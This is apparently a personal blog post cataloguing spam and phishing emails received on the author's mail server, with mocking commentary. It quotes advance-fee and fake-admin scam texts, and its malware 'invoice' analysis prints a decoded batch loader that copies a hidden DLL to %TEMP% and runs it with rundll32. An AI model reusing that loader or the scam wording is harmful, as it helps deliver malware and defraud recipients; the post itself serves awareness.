My Little SPAM Collection
I have been running a mail server for this site for the past year or so, and through the magic of SPAM and SPAM filters, I have acquired an ever growing collection of SPAM messages, phishing attempts and different attempts at getting my money one way or another.
Note: This post is getting regular updates as I get more and more SPAM.
- Regular SPAM
- Classic “Nigerian Prince” scam
- This is the server admin!
- Notice from a service you didn’t use
- Please open the “invoice” attached
- New login attempt!
- Notice from a service I do use
- Please buy this other domain from us!
- We send SPAM for you! Low prices!
Regular SPAM
Barely worth any mention, but it is there. Your runn-of-the-mill SEO proposals, links to dubious quality stuff on AlieExpress, etc… These are boring but they exist so with that out of the way, let’s start with the funnier ones that landed on my server’s SPAM folder.
Classic “Nigerian Prince” scam
I was very surprised both by these emails existing in 2022 and them being pretty much exactly the same they have been since I have memory of the Internet. The “Nigerian Prince” scam or “Advance fee fraud” promises a large amount of money in return of you, the mark, paying the “fees” needed to unlock that money.
A typical example from my mailbox, redacted for brevity and scammers’ privacy:
Dear Sir
Sir, greetings to you and your family, I hope you all are in good health ? It is my pleasure to read your response and I thank you very much for your reply. May God bless you..
I am Miss Sonia Peter Fofo, the only daughter of PETER FOFO who died in a motor accident some months ago. He was a contractor to the federal government of Cote d’Ivoire. Before he gave up in the hospital he told my mother and I that he deposited a sum of US $ 3.5 million with a bank in Lome-Togo and where the documents are.
Now we are looking for someone who will assist us and claim the (money) so that when it arrives in his home/ country he will take his own share and send it to us our own. I am writing this mail to see if you can assist us.
Upon receipt of your acknowledgment mail I shall send you the contact of the bank director. Please contact me back on my private email : [scammer]@aol.com
Thanks
Miss Sonia Peter Fofo
Pretty standard stuff. Bad grammar, generic platitudes, large sums of money from someone using free email, some generic sob story, reply to an email different from the one used to send the email, etc…
SpamAssassing analysis result were also pretty funny, especially knowing that certain sentences like “Dear [whatever]” will immediately rise the SPAM level of a message.
| Rule | Description |
|---|---|
DEAR_SOMETHING |
BODY: Contains ‘Dear (something)’ |
LOTS_OF_MONEY |
Huge… sums of money |
MONEY_FREEMAIL_REPTO |
Lots of money from someone using free email? |
MONEY_FRAUD_8 |
Lots of money and very many fraud phrases |
This is the server admin!
I have received one or some of these, and a few can punch through SpamAssassin and land on my inbox. These messages look like a mailer error, or some server warning that requires attention from the user. Most of these claim to be from the mail server administrator (hello me!) and require clicking on some link to check what the issue is.
These tend to look kinda professional and the HTML formatting is decent. An example, although text-only, of these messages:
Message generated from heavydeck.net server.
Notification Dear root,
Your account associated with your root@heavydeck.net has been limited Reason: Messages - Delivery Process Failed .
What happens when new messages are inaccessible?
Once a new message is limited, it will be inaccessible—users will not be able to receive new messages.
Want to keep the account and receive new messages? [Link to scammers website]
heavydeck.net email support
Funny, I don’t remember sending myself an email regarding an issue I myself should already be aware of… 🤔
Notice from a service you didn’t use
This one was pretty funny. I receive a notice from a service where they inform me that they are shutting down, but I can get all of the database before they do. For a nominal fee, of course.
Hello,
My name is [whatever]
I regret to inform you that [scam.org] will shut down Friday.
We have now made all our databases available to the public on our website at a one-time fee. Visit us at [scam.org]
Among other things, this SPAM email was received as plain text, with no embedded links nor referral URLs, just a link written on the message as-is.
Additionally, the domain was registered ~6 months back (at the time of writing) and will expire in 6 months. On that time this completely legit company has managed to start, launch, and prepare for shutting down. In 6 months.
Very very pessimistic entrepreneurs.
Please open the “invoice” attached
Another classic. An email from an alleged rental car company (in this case) sends me an invoice attached to the email. Grammar was bad and email formatting was subpar, with just “Re:” as the subject.
Unlike any other rental car service where invoices come as a PDF document, this “company” invoice comes on a password protected ZIP, containing an ISO file, containing a windows link file.
Hello, Let me share the papers we talked regarding a few days ago. Let me know if you have any queries relating to the attachments.
Personal password: doc1234
We look forward to hearing from you soon.
Kind regards,
Attached car papers to this link
Analysis of the “invoice”
The ISO file apparently contains a single .lnk file, however, the link
points to the file ladpsikeyfad/expressimaging.bat which is not visible for
the user since it is under the hidden (by the UDF filesystem contained on the
ISO file) directory ladpsikeyfad which Windows can access if you know the
full path, which the attacker knows of course.
Now what does expressimaging.bat do? Well, it is a batch file, scrambled
using %variables% but after decoding it, the command line is
@echo off
xcopy /s /i /e /h ladpsikeyfad\rewarding.dat %TEMP%\*
rundll32 %TEMP%\rewarding.dat,#1
In essence, just copy this rewarding.dat file to %TEMP% and execute
it with rundll32.
Time to spin up a virtual machine and check what this car rental company
had for me. (Me from the past: “My bet is on a cryptolocker”)
Opening the “invoice”
Meanwhile, Me from a few hours later…
Whatever the executable is, it doesn’t seem to do a thing on a VM without
internet connection. It just sits there, running, using barely 1M of RAM…
A few hours later…
Let’s give it internet… Becasue I’m curious about it…
Nothing. The C&C must be down…
New login attempt!
This one surprised me. I received a “new login” notification on my own server, which does not have any service you can login to. This login is apparently suspicious (you don’t say) and your account mey be suspended if no action is taken.
That shiny blue button links to an IPFS gateway which will probably give me a very, very legit site. Let’s check it out removing the trailing tracking info that points to my email.
Secured by Norton. I already feel safe! Although it don’t remember even having a webmail service at all on this server.
Scammer cannot fill in the blanks
Edit: Bonus content! Scammers cannot fill in the data of the scam as a service packege they bought!
This one is just like the previous one, suspicious login on your stock trading account and blah blah blah. However, this one caught my eye because the wannabe scammer clearly used a “fill in the blanks” template for this…
… And then forgot to actually fill in the blanks. Money well spent.
Renewal notice from a service I do use
This one I almost fell for. A scammer sent me a “renewal” notice impersonating a service I do use, NetCup, telling me my domain is about to expire. All the contents of the message were correct, except for one thing, I do not use NetCup as my registrar. They seem to be aware of the issue but just take a look anyway:
Kudos for the scammer for:
- Getting the hosting service correctly
- Sending the message in the correct language (german)
- Getting the domain name expiration date correctly
- Making a decent look-alike email
Edit: Some native german speakers confirmed the language is “kinda broken” but for someone learning german, it just looked the part good enough.
Would you be interested in this other domain?
This one is new. I do not, nor have I been interested in owning, the dot com version of this same domain, since this is, after all, just my personal site which started as a joke on a game I haven’t played in close to a decade.
However, as of the last few days I have received no less than an email a day asking if I was interested in purchasing the dot com version of the domain. With each new email the tone seems to subtly change.
Edit: This email spamming has gotten so bad I made a dedicated post.
We send SPAM for you
Another SPAM message, offering SPAM services, which was caught by my SPAM filter (not a good look).
Advertise up to 200 MILLION EMAILS WITH THE LOWEST PRICE! Immediate BOOM OF SALES!
[…]
( ) US$ 150 - Advertise to 1 MILLION EMAILS
( ) US$ 200 - Advertise to 5 MILLION EMAILS
( ) US$ 300 - Advertise to 25 MILLION EMAILS
( ) US$ 500 - Advertise to 50 MILLION EMAILS
( ) US$ 750 - Advertise to 100 MILLION EMAILS
( ) US$ 1000 - Advertise to 200 MILLION EMAILS
Acording to the info provided this internet company from Brazil has been doing SPAM as a service since 1998.